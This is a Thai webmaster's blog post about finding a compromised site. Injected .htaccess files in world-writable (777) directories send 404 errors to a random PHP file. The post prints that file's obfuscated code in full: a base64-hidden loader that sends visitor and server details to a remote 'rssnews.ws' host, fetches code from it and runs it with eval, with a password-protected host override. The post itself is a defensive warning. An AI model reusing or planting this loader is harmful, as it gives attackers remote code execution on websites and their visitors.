วันนี้ก็เข้า web master tool ตามปกติ ที่จะเข้าวันละ 1 ครั้งอยู่แล้ว เพื่อตรวจเช็ค error ต่างๆ บน site map และเช็คอื่นๆ
แต่วันนี้เจอเรื่องแปลกมาก (ตามรูป)
ที่วงแดงๆ ไว้
จริงๆ แล้วไม่ทราบว่ามันคืออะไร ตอนแรกเห็น WP ก็นึกว่าเป็น cache ของระบบ (ใน config.php ใช้คำสั่ง define cache true ไว้) แต่พอมองดูดีๆ
เฮ้ย?? มันไป แคชบ้าอะไรในธีมนั้น แถมนามสกุล .html
(แถมอยู่ใน dir image ซะงั้น)
เลยเปิด fire zilla เข้าไปดูอย่างด่วนเลย ก็พอว่า
ทุก dir ที่ ตั้ง permission 777 ไว้
จะมี .htaccess
Options -MultiViews
ErrorDocument 404 //dir/path/to/235984.php
Options -MultiViews
ErrorDocument 404 /dir/path/to/235984.php
Options -MultiViews
ErrorDocument 404 /dir/path/to/235984.php
อยู่ dir ไหนก็จะมี ชื่อพาธตามนั้นอ่ะ
แล้วใน ไฟล์ php (สุ่มเลข) ก็จะมีโค้ดตามนี้
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="6b5c989d96a8617d098f67be813b4c3b") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
(มันคือไรฟะ สั่งโหลดอะไรละนั้น เทพ php ช่วยบอกที :'()
พอลองไล่ๆ ดู มีทุก dir ที่ 777 ไว้ทุก dir เลย
ตอนแรกคิดว่ามันคงเป็น แคชอ่ะนะ แต่พอดู config.php ของอีกเว็บนึง มันไม่ได้ตั้งไว้... (งานเข้าละไง)
เลย ลบทิ้งหมด ไม่สนว่ามันจะเป็นไฟล์อะไรแล้ว
เข้าไปลบที่หน้า control panel นะ ทุก dir ที่ 777 มีการแก้ไขเมื่อวันที่ 2 เมษายน ที่ผ่านมานี่เอง
ก็เลยมาบอกเพื่อนๆ กันสักนิด ควรจะตรวจสอบ dir ที่ 777 ด้วยนะจ้า ไฟล์ไหนไม่มั่นใจลบโลด เพื่อความปลอดภัยของเว็บ
ไม่ใช่เฉพาะ WP นะ ใช้ cms ตัวอื่น หรือ เขียนเอง ก็ตรวจสอบดูบ้างนะ
ตอนนี้เลยเปลี่ยน permisson หมดแล้ว รอดูอีกสัก 2-3 วัน
มันมาจากไหนหว่า
ไ่ม่เข้าใจ
พัฒนาเว็บไซต์
